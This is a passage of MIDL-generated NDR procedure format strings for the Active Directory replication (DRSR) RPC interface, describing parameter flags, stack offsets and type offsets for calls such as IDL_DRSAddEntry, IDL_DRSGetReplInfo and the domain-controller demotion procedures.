/* 1048 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1050 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1052 */	NdrFcShort( 0x4113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=16 */
/* 1054 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1056 */	NdrFcShort( 0xe5a ),	/* Type Offset=3674 */

	/* Return value */

/* 1058 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1060 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1062 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSAddEntry */

/* 1064 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1066 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1070 */	NdrFcShort( 0x11 ),	/* 17 */
/* 1072 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1074 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1076 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1078 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1080 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1082 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1084 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1086 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1088 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1090 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1092 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1094 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1096 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1098 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1100 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1102 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1104 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1106 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1108 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1110 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1112 */	NdrFcShort( 0x1030 ),	/* Type Offset=4144 */

	/* Parameter pdwOutVersion */

/* 1114 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1116 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1118 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1120 */	NdrFcShort( 0x113 ),	/* Flags:  must size, must free, out, simple ref, */
/* 1122 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1124 */	NdrFcShort( 0x10a4 ),	/* Type Offset=4260 */

	/* Return value */

/* 1126 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1128 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1130 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSExecuteKCC */

/* 1132 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1134 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1138 */	NdrFcShort( 0x12 ),	/* 18 */
/* 1140 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1142 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1144 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1146 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1148 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1150 */	NdrFcShort( 0x8 ),	/* 8 */
/* 1152 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
			0x4,		/* 4 */
/* 1154 */	0xa,		/* 10 */
			0x45,		/* Ext Flags:  new corr desc, srv corr check, has range on conformance */
/* 1156 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1158 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1160 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1162 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1164 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1166 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1168 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1170 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1172 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1174 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1176 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1178 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1180 */	NdrFcShort( 0x12de ),	/* Type Offset=4830 */

	/* Return value */

/* 1182 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1184 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1186 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSGetReplInfo */

/* 1188 */	0x0,		/* 0 */
			0x49,		/* Old Flags:  full ptr, */
/* 1190 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1194 */	NdrFcShort( 0x13 ),	/* 19 */
/* 1196 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1198 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1200 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1202 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1204 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1206 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1208 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1210 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1212 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1214 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1216 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1218 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1220 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1222 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1224 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1226 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1228 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1230 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1232 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1234 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1236 */	NdrFcShort( 0x130a ),	/* Type Offset=4874 */

	/* Parameter pdwOutVersion */

/* 1238 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1240 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1242 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1244 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 1246 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1248 */	NdrFcShort( 0x136a ),	/* Type Offset=4970 */

	/* Return value */

/* 1250 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1252 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1254 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSAddSidHistory */

/* 1256 */	0x0,		/* 0 */
			0x49,		/* Old Flags:  full ptr, */
/* 1258 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1262 */	NdrFcShort( 0x14 ),	/* 20 */
/* 1264 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1266 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1268 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1270 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1272 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1274 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1276 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1278 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1280 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1282 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1284 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1286 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1288 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1290 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1292 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1294 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1296 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1298 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1300 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1302 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1304 */	NdrFcShort( 0x17e8 ),	/* Type Offset=6120 */

	/* Parameter pdwOutVersion */

/* 1306 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1308 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1310 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1312 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 1314 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1316 */	NdrFcShort( 0x1888 ),	/* Type Offset=6280 */

	/* Return value */

/* 1318 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1320 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1322 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSGetMemberships2 */

/* 1324 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1326 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1330 */	NdrFcShort( 0x15 ),	/* 21 */
/* 1332 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1334 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1336 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1338 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1340 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1342 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1344 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1346 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1348 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1350 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1352 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1354 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1356 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1358 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1360 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1362 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1364 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1366 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1368 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1370 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1372 */	NdrFcShort( 0x18ac ),	/* Type Offset=6316 */

	/* Parameter pdwOutVersion */

/* 1374 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1376 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1378 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1380 */	NdrFcShort( 0x4113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=16 */
/* 1382 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1384 */	NdrFcShort( 0x190a ),	/* Type Offset=6410 */

	/* Return value */

/* 1386 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1388 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1390 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSReplicaVerifyObjects */

/* 1392 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1394 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1398 */	NdrFcShort( 0x16 ),	/* 22 */
/* 1400 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1402 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1404 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1406 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1408 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1410 */	NdrFcShort( 0x8 ),	/* 8 */
/* 1412 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
			0x4,		/* 4 */
/* 1414 */	0xa,		/* 10 */
			0x45,		/* Ext Flags:  new corr desc, srv corr check, has range on conformance */
/* 1416 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1418 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1420 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1422 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1424 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1426 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1428 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwVersion */

/* 1430 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1432 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1434 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgVerify */

/* 1436 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1438 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1440 */	NdrFcShort( 0x1968 ),	/* Type Offset=6504 */

	/* Return value */

/* 1442 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1444 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1446 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSGetObjectExistence */

/* 1448 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1450 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1454 */	NdrFcShort( 0x17 ),	/* 23 */
/* 1456 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1458 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1460 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1462 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1464 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1466 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1468 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1470 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1472 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1474 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1476 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1478 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1480 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1482 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1484 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1486 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1488 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1490 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1492 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1494 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1496 */	NdrFcShort( 0x19a0 ),	/* Type Offset=6560 */

	/* Parameter pdwOutVersion */

/* 1498 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1500 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1502 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1504 */	NdrFcShort( 0x4113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=16 */
/* 1506 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1508 */	NdrFcShort( 0x19e8 ),	/* Type Offset=6632 */

	/* Return value */

/* 1510 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1512 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1514 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSQuerySitesByCost */

/* 1516 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1518 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1522 */	NdrFcShort( 0x18 ),	/* 24 */
/* 1524 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1526 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1528 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1530 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1532 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1534 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1536 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1538 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1540 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1542 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1544 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1546 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1548 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1550 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1552 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1554 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1556 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1558 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1560 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1562 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1564 */	NdrFcShort( 0x1a46 ),	/* Type Offset=6726 */

	/* Parameter pdwOutVersion */

/* 1566 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1568 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1570 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1572 */	NdrFcShort( 0x6113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=24 */
/* 1574 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1576 */	NdrFcShort( 0x1aac ),	/* Type Offset=6828 */

	/* Return value */

/* 1578 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1580 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1582 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSInitDemotion */

/* 1584 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1586 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1590 */	NdrFcShort( 0x19 ),	/* 25 */
/* 1592 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1594 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1596 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1598 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1600 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1602 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1604 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1606 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1608 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1610 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1612 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1614 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1616 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1618 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1620 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1622 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1624 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1626 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1628 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1630 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1632 */	NdrFcShort( 0x1b0c ),	/* Type Offset=6924 */

	/* Parameter pdwOutVersion */

/* 1634 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1636 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1638 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1640 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 1642 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1644 */	NdrFcShort( 0x1b30 ),	/* Type Offset=6960 */

	/* Return value */

/* 1646 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1648 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1650 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSReplicaDemotion */

/* 1652 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1654 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1658 */	NdrFcShort( 0x1a ),	/* 26 */
/* 1660 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1662 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1664 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1666 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1668 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1670 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1672 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1674 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1676 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1678 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1680 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1682 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1684 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1686 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1688 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1690 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1692 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1694 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1696 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1698 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1700 */	NdrFcShort( 0x1b54 ),	/* Type Offset=6996 */

	/* Parameter pdwOutVersion */

/* 1702 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 1704 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 1706 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 1708 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 1710 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 1712 */	NdrFcShort( 0x1b8c ),	/* Type Offset=7052 */

	/* Return value */

/* 1714 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 1716 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 1718 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSFinishDemotion */

/* 1720 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 1722 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1726 */	NdrFcShort( 0x1b ),	/* 27 */
/* 1728 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1730 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1732 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1734 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1736 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1738 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1740 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1742 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1744 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1746 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1748 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1750 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1752 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1754 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1756 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1758 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1760 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1762 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1764 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1766 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1768 */	NdrFcShort( 0x1bb0 ),	/* Type Offset=7088 */

	/* Parameter pdwOutVersion */

/* 1770 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
